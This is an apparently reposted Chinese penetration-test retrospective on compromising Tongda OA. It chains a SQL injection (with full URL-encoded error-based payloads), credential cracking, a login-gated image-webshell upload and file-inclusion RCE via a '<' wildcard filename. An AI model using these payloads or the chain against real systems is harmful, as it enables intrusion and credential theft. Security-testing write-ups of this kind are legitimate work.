一波三折的通达OA—复盘

  • A+
所属分类:安全文章
一波三折的通达OA—复盘

攻击路径:

  1. wooyun上的历史漏洞

  2. 通过一枚sql注入获取到账号密码

  3. 登录,文件上传(需要登录),图片马

  4. 文件包含 —> RCE


漏洞触发点:

wooyun-2015-0116359(前台sql注入)

/general/score/flow/scoredate/result.php?FLOW_ID=

获取数据库版本

mysql

  • select version()

  • select @@version

/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from(select%20count(*),concat(floor(rand(0)*2),(substring((select%20verion()),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from(select%20count(*),concat(floor(rand(0)*2),(substring((select%[email protected]@version),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23

获取当前用户

  • select user()

  • select system_user()

/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from(select%20count(*),concat(floor(rand(0)*2),(substring((select%20user()),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from(select%20count(*),concat(floor(rand(0)*2),(substring((select%20system_user()),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23


最后直接上sqlmap跑,并成功获取到账号密码。但是由于没法直接解密,这里采用的是构造字典然后爆破姿势成功获取到账号。


文件上传(需要登录)

前期准备:

  • 图片马

tongda.jpg一波三折的通达OA—复盘


  • 构造上传表单一波三折的通达OA—复盘一波三折的通达OA—复盘

一波三折的通达OA—复盘

到这里,图片马的上传算是成功完成了。


文件包含

上传的图片马将会被重命名且没有回显。经过本地搭建环境测试发现其重命名规则为:

tongda.jpg —> 10位随机数.tongda.jpg

例如:

1020634445.tongda.jpg

所以此时便有了有两条思路

  • 10^10次尝试 :爆破文件名前置的10位随机数

  • <<<<<<<<<<.tongda.jpg

  • >>>>>>>>>>.tongda.jpg一波三折的通达OA—复盘


最后成功通过'<'构造了马的包含姿势。一波三折的通达OA—复盘




本文始发于微信公众号(don9sec):一波三折的通达OA—复盘

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: